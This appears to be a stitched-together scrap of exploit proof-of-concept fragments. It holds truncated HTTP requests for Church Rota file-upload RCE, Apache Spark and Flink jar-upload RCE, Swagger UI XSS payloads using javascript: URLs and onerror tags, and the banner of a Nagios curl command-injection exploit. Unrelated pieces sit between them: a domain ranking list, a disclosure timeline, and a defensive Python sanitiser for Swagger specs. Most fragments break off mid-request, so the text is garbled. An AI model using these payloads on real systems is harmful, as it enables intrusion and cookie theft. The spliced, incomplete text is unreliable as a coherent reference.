POST /login.php5 HTTP/1.1
Accept: application/json
Connection: close
Content-Length: 100
Content-Type: application/json

{
"login_auth": 0,
"miniHiveUI": 1,
14 apple.com
40 vk.com
44 github.com
49 tumblr.com
55 dropbox.com
85 medium.com
87 paypal.com
92 icloud.com
100 booking.com
112 weebly.com
Church Rota version 2.6.4 is vulnerable to authenticated remote code execution: any authenticated user can upload and execute an arbitrary file through resources.php?action=newsent, without holding the file upload permission.
POST /resources.php?action=newsent HTTP/1.1
Host: 192.168.43.187
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------36504512417128952451539028145
Content-Length: 526
swagger: '2.0'
info:
  title: Swagger Test
  description: <img src=x onerror=\"alert(document.domain)\">
  default: <script>console.log('000000000000000000dad0000000000000000000');</script>
  license:
    name: BSD
    url: <img src=x onerror=\"alert(document.domain)\">
  version: '30'
produces:
swagger: "2.0"
info:
  title: "Swagger Test Poc XSS"
  description: "Please to click Terms of service"
  termsOfService: "javascript:alert(document.cookie)"
  contact:
    name: "API Support"
    url: "javascript:alert(document.cookie)"
    email: "javascript:alert(document.cookie)"
  version: "1.0.1"
{
  "swagger": "2.0",
  "info": {
    "title": "Swagger Test Poc XSS",
    "description": "Please to click Terms of service",
    "termsOfService": "javascript:alert(document.domain)",
    "version": "1.0.1"
  },
  "basePath": "/v1",
  "schemes": [
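The three Swagger PoCs above all rely on the same thing: Swagger UI renders `info.description` as HTML-capable text and puts `termsOfService`, `contact.url`, `contact.email` and `license.url` into link targets, so a `javascript:` URL or an inline tag lands in the page unescaped. The following is an added example, not code from any of the gists above or from the Swagger project, that checks a parsed spec for exactly those payloads before it is handed to a renderer and produces a neutralised copy. It assumes the spec has already been parsed from YAML or JSON into Python dicts; the sample spec is constructed by merging the info blocks of the PoCs above, and the field list and scheme list are the author's assumptions, not a Swagger UI allow-list.

```python
"""Scan a Swagger/OpenAPI 2.0 document for XSS payloads in the info block.

Added example (not from the gists above). Assumes the spec is already parsed
into Python objects and that the renderer treats termsOfService / contact.url /
contact.email / license.url as link targets and description as HTML-capable
text, which is what the PoCs above abuse.
"""
import copy
import html
import re

# Constructed sample: the info blocks of the XSS PoCs above merged into one spec.
SAMPLE_SPEC = {
    "swagger": "2.0",
    "info": {
        "title": "Swagger Test Poc XSS",
        "description": '<img src=x onerror="alert(document.domain)">',
        "termsOfService": "javascript:alert(document.cookie)",
        "contact": {
            "name": "API Support",
            "url": "javascript:alert(document.cookie)",
            "email": "javascript:alert(document.cookie)",
        },
        "license": {"name": "BSD", "url": "https://opensource.org/licenses/BSD-3-Clause"},
        "version": "1.0.1",
    },
}

# Keys whose values end up in an href (assumption based on the PoCs above; email is
# flagged conservatively because some renderers interpolate it into a mailto: link).
LINK_FIELDS = {"termsOfService", "url", "email"}
HTML_TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")
# Schemes that execute or smuggle script when used as a link target.
DANGEROUS_SCHEME_RE = re.compile(r"^(javascript|vbscript|data):", re.IGNORECASE)
# Browsers strip ASCII control characters and whitespace before parsing the scheme,
# so "java\tscript:" must be treated like "javascript:".
CONTROL_WS_RE = re.compile(r"[\x00-\x20]")


def _walk(node, path="info"):
    """Yield (container, key, dotted_path, value) for every string leaf under node."""
    if isinstance(node, dict):
        items = node.items()
    elif isinstance(node, list):
        items = enumerate(node)
    else:
        return
    for key, value in items:
        child_path = f"{path}.{key}" if isinstance(node, dict) else f"{path}[{key}]"
        if isinstance(value, (dict, list)):
            yield from _walk(value, child_path)
        elif isinstance(value, str):
            yield node, key, child_path, value


def _is_dangerous_link(key, value):
    return key in LINK_FIELDS and bool(DANGEROUS_SCHEME_RE.match(CONTROL_WS_RE.sub("", value)))


def find_injected_payloads(spec):
    """Return [(dotted_path, kind)] for every info.* string that would be rendered unsafely."""
    findings = []
    for _parent, key, path, value in _walk(spec.get("info") or {}):
        if _is_dangerous_link(key, value):
            findings.append((path, "dangerous-url-scheme"))
        if HTML_TAG_RE.search(value):
            findings.append((path, "html-markup"))
    return findings


def sanitize_spec(spec):
    """Return a deep copy in which dangerous links are dropped and markup is escaped."""
    clean = copy.deepcopy(spec)
    # Materialise the leaves first: deleting keys while the generator iterates would fail.
    leaves = list(_walk(clean.get("info") or {}))
    for parent, key, _path, value in leaves:
        if _is_dangerous_link(key, value):
            del parent[key]  # a javascript: link cannot be repaired, only removed
        elif HTML_TAG_RE.search(value):
            parent[key] = html.escape(value, quote=True)
    return clean


if __name__ == "__main__":
    for path, kind in find_injected_payloads(SAMPLE_SPEC):
        print(f"{kind:22} {path}")
    print(find_injected_payloads(sanitize_spec(SAMPLE_SPEC)))
```

Escaping `description` rather than deleting it keeps the human-readable text while rendering the tag inert; link fields are removed outright because there is no safe rewrite of a `javascript:` target. The control-character stripping matters in practice: a spec that passes a naive `startswith("javascript:")` check can still carry `java\tscript:`.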
#!/usr/bin/env python
intro = """\033[94m
Nagios Core < 4.2.0 Curl Command Injection PoC Exploit (CVE-2016-9565)
nagios_cmd_injection.py ver. 1.0
Discovered & Coded by:
Dawid Golunski
https://legalhackers.com
\033[0m
- vendor page: https://pacsone.net/
- patched version: 7.1.1
- Credits: Xinjie Ma from Chaitin Research Lab
- 2020.07.19: report sent to a partner of the vendor
- 2020.07.20: the partner forwarded it to the actual vendor
Apache Spark RCE
POST /v1/submissions/create HTTP/1.1
Host: ip:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 619
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip

{
POST /jars/upload HTTP/1.1
Host: REDACTED:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 187
Content-Type: multipart/form-data;boundary=8ce4b16b22b58894aa86c421e8759df3
Accept-Encoding: gzip

--8ce4b16b22b58894aa86c421e8759df3
Content-Disposition: form-data; name="jarfile";filename="pikpikcu.jar"